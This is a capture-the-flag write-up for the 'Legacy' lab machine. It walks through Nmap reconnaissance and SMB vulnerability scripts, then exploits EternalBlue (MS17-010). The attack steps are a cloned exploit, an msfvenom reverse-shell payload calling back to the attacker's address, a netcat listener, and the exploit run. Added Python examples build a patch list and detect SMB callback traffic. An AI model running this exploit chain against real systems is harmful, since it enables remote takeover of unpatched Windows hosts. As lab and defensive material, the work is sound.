Legacy Writeup

Without Metasploit

Reconnaissance

Initial Nmap scan to find open ports, treating every host as online and skipping host discovery (-Pn)

nmap -Pn 10.10.10.4

Detailed Nmap scan:

Command breakdown:

  • (-sV): Probe the open ports for service and version information

  • (-sC): Run the default set of Nmap scripts

  • (-p): Scan only ports 139, 445 and 3389

  • (-oN nmap): Save the output in normal format to a file called nmap

nmap -sC -sV -p 139,445,3389 -oN nmap 10.10.10.4

Enumeration

SMB is a common service with well-known vulnerabilities, so let's use Nmap's SMB-specific scripts to check for them.

nmap --script smb-vuln* -p 139,445 10.10.10.4

We can see that the host is vulnerable to CVE-2008-4250 (MS08-067) and CVE-2017-0143 (MS17-010), two widely known vulnerabilities.
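The smb-vuln scripts report a state per CVE, and on a real network you would scan many hosts, not one. The following is an added example, not part of this writeup or of Nmap, showing how to turn the XML report that Nmap writes with -oX (rather than the normal output saved with -oN above) into a list of hosts that need patching. The XML sample, the addresses in it and the remediation table are constructed for the example; the element layout follows the shape Nmap's vulns library produces, but check it against a real -oX file before relying on it.

```python
"""Summarise smb-vuln* findings from an nmap -oX report into a patch list.

Added example (not the writeup's or Nmap's code). The XML below is a
constructed sample in the shape nmap's vulns library emits for smb-vuln
scripts; the state text is what the parser keys on.
"""
import xml.etree.ElementTree as ET

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="10.10.10.4" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms08-067" output="VULNERABLE">
        <table key="CVE-2008-4250">
          <elem key="title">Microsoft Windows system vulnerable to remote code execution (MS08-067)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
      <script id="smb-vuln-ms17-010" output="VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
      <script id="smb-vuln-ms10-054" output="false"/>
    </hostscript>
  </host>
  <host>
    <address addr="10.10.10.5" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="NOT VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="state">NOT VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""

# Remediation per script id; MS17-010 is the SMBv1 fix, so disabling SMBv1 is listed too.
REMEDIATION = {
    "smb-vuln-ms08-067": "install MS08-067",
    "smb-vuln-ms17-010": "install MS17-010 and disable SMBv1",
}

# The vulns library uses states such as VULNERABLE, VULNERABLE (Exploitable),
# LIKELY VULNERABLE and NOT VULNERABLE; only the first three count as findings.
POSITIVE_PREFIXES = ("VULNERABLE", "LIKELY VULNERABLE")


def parse_smb_vulns(xml_text):
    """Return {ip: [(script_id, vuln_key, state), ...]} for hosts with a positive state."""
    root = ET.fromstring(xml_text)
    findings = {}
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        for script in host.iter("script"):
            if not script.get("id", "").startswith("smb-vuln"):
                continue
            # Each vuln id becomes a <table key="CVE-..."> with an <elem key="state"> inside.
            for table in script.findall("table"):
                state = table.find("elem[@key='state']")
                if state is not None and (state.text or "").startswith(POSITIVE_PREFIXES):
                    findings.setdefault(ip, []).append(
                        (script.get("id"), table.get("key"), state.text)
                    )
    return findings


def patch_list(findings):
    """One human-readable action line per (host, finding)."""
    lines = []
    for ip, items in sorted(findings.items()):
        for script_id, vuln_key, state in items:
            action = REMEDIATION.get(script_id, "see vendor advisory")
            lines.append(f"{ip}: {vuln_key} {state} via {script_id} -> {action}")
    return lines


if __name__ == "__main__":
    for line in patch_list(parse_smb_vulns(SAMPLE_XML)):
        print(line)
```

To use it on your own scan, run the same script scan with -oX instead of -oN and pass the file contents to parse_smb_vulns; the second sample host shows that a NOT VULNERABLE state is skipped rather than reported.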

Exploitation

The vulnerability we will be exploiting is commonly called EternalBlue; it is a flaw in Microsoft's implementation of the Server Message Block (SMB) protocol. An attacker who can send a crafted payload to the SMB service is able to execute arbitrary code on the target machine.

There is a great article explaining this vulnerability and how to exploit it.

First let us download the exploit from GitHub

git clone https://github.com/helviojunior/MS17-010.git

Now we use msfvenom to create a reverse shell payload

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=1234 -f exe > exploit.exe

Now let's start a listener on our machine

nc -lvnp 1234

Let's run the exploit

python send_and_execute.py 10.10.10.4 exploit.exe

And we have a reverse shell.

Now, if we try using the whoami command to find out what privileges we have on the system, it does not work, so I just went looking for both the flags and found out that I can read both of them, which means we are NT AUTHORITY\SYSTEM.
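From the defender's side, the sequence above leaves a simple network footprint: a peer connects to the server on 445, and moments later the server opens a brand-new connection back to that same peer on an unrelated port (the listener on 1234 here). The following is an added example, not part of this writeup, that looks for exactly that pattern in connection logs. The log format, addresses and timestamps are constructed for the example; adapt parse_log to whatever your firewall or flow collector actually emits.

```python
"""Flag the 'inbound SMB, then outbound callback to the same peer' pattern.

Added example (not the writeup's code). SAMPLE_LOG is constructed; the line
format "time src:sport -> dst:dport" is an assumption, not a real product's
format.
"""
from datetime import datetime, timedelta

SAMPLE_LOG = """\
2024-01-01T10:00:01 10.10.14.19:49152 -> 10.10.10.4:445
2024-01-01T10:00:03 10.10.14.19:49153 -> 10.10.10.4:445
2024-01-01T10:00:04 10.10.10.4:1035 -> 10.10.14.19:1234
2024-01-01T10:05:00 10.10.10.7:1036 -> 10.10.10.9:80
2024-01-01T10:06:00 10.10.14.19:49160 -> 10.10.10.7:445
2024-01-01T11:00:00 10.10.10.7:1037 -> 10.10.14.19:443
"""

# How soon after the SMB connection a callback must appear to be suspicious.
WINDOW = timedelta(seconds=60)


def parse_log(text):
    """Parse the constructed log format into (time, src_ip, src_port, dst_ip, dst_port)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, rest = line.split(" ", 1)
        src, dst = rest.split(" -> ")
        sip, sport = src.rsplit(":", 1)
        dip, dport = dst.rsplit(":", 1)
        events.append((datetime.fromisoformat(ts), sip, int(sport), dip, int(dport)))
    return events


def find_smb_callbacks(events, window=WINDOW, smb_ports=(139, 445)):
    """Return [(server, peer, smb_time, callback_time, callback_port), ...].

    A hit means `server` accepted an SMB connection from `peer` and, within
    `window`, initiated a non-SMB connection back to `peer`. A server should
    normally never be the client side of a connection to whoever just spoke
    SMB to it, so this is a cheap indicator worth an analyst's attention.
    """
    alerts = []
    last_smb = {}  # (server, peer) -> time of the most recent inbound SMB connection
    for ts, sip, sport, dip, dport in sorted(events):
        if dport in smb_ports:
            last_smb[(dip, sip)] = ts
        key = (sip, dip)  # this event seen as server -> peer
        if key in last_smb and dport not in smb_ports and ts - last_smb[key] <= window:
            alerts.append((sip, dip, last_smb[key], ts, dport))
    return alerts


if __name__ == "__main__":
    for server, peer, smb_ts, cb_ts, port in find_smb_callbacks(parse_log(SAMPLE_LOG)):
        print(f"{server} called back to {peer}:{port} at {cb_ts} after SMB at {smb_ts}")
```

The second server in the sample (10.10.10.7) also talks to the same peer, but 54 minutes after the SMB contact, so it stays below the threshold; tune WINDOW to your environment, and note that the check says nothing about the content of the callback, only its timing and direction.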
